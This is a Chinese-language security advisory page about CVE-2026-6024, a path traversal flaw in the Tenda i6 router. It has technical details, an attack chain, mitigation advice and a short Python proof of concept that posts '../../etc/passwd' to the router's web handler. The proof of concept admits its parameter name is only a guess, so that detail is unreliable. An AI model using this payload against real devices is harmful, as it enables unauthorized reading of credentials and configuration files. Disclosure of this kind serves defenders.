IPBUF安全漏洞报告
English
CVE-2026-6024 CVSS 7.3 高危

CVE-2026-6024 Tenda i6 路径遍历漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-6024
漏洞类型
路径遍历
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda i6 路由器

相关标签

路径遍历Tenda路由器CVE-2026-6024物联网安全

漏洞概述

Tenda i6 1.0.0.7(2204)版本被曝出存在路径遍历漏洞。该漏洞源于HTTP Handler组件中R7WebsSecurityHandlerfunction函数对用户输入的处理不当。攻击者可以在无需用户交互和身份认证的情况下,通过网络远程发送恶意构造的请求,利用该漏洞读取系统敏感文件或进行未授权操作。鉴于该漏洞利用代码已被公开披露,且CVSS评分为7.3(高危),对使用该版本设备的用户构成了严重的安全威胁,需引起高度重视。

技术细节

该漏洞位于Tenda i6路由器的Web服务器处理逻辑中,具体涉及R7WebsSecurityHandlerfunction函数。该函数在处理传入的HTTP请求参数时,未对包含路径遍历字符(如“../”)的字符串进行充分的过滤或净化。攻击者可以通过向特定接口发送包含恶意路径的请求,绕过Web根目录限制,访问操作系统的任意文件。根据CVSS 3.1向量分析,攻击复杂度低(AC:L),无需权限(PR:N)且无需用户交互(UI:N),这使得攻击者可以轻易地通过自动化脚本进行大范围扫描和攻击。虽然当前评估的机密性、完整性和可用性影响均为“低”,但结合IoT设备常存储敏感配置信息的特性,实际风险可能更高。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出存在漏洞的Tenda i6路由器及其版本信息。
STEP 2
2. 漏洞利用
攻击者向目标设备的HTTP Handler接口发送特制的恶意数据包,利用R7WebsSecurityHandlerfunction函数的过滤缺陷注入路径遍历字符。
STEP 3
3. 获取数据
成功绕过限制后,攻击者读取系统敏感文件(如/etc/passwd或配置文件),获取设备的认证信息或其他敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-6024 # Target: Tenda i6 1.0.0.7(2204) # Vulnerability: Path Traversal via R7WebsSecurityHandlerfunction target_url = "http://192.168.1.1/goform/R7WebsSecurityHandlerfunction" # Payload attempting to read /etc/passwd # The specific parameter name might vary, this is a representative example payload = { "file_path": "../../etc/passwd" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: # Sending the request response = requests.post(target_url, data=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Request sent successfully!") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Tenda i6 1.0.0.7(2204)

防御指南

临时缓解措施
在官方未发布修复补丁前,建议用户关闭路由器的远程Web管理功能,并仅允许受信任的内网IP访问管理界面。同时,应密切留意厂商的安全公告,及时进行固件更新以修补漏洞。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表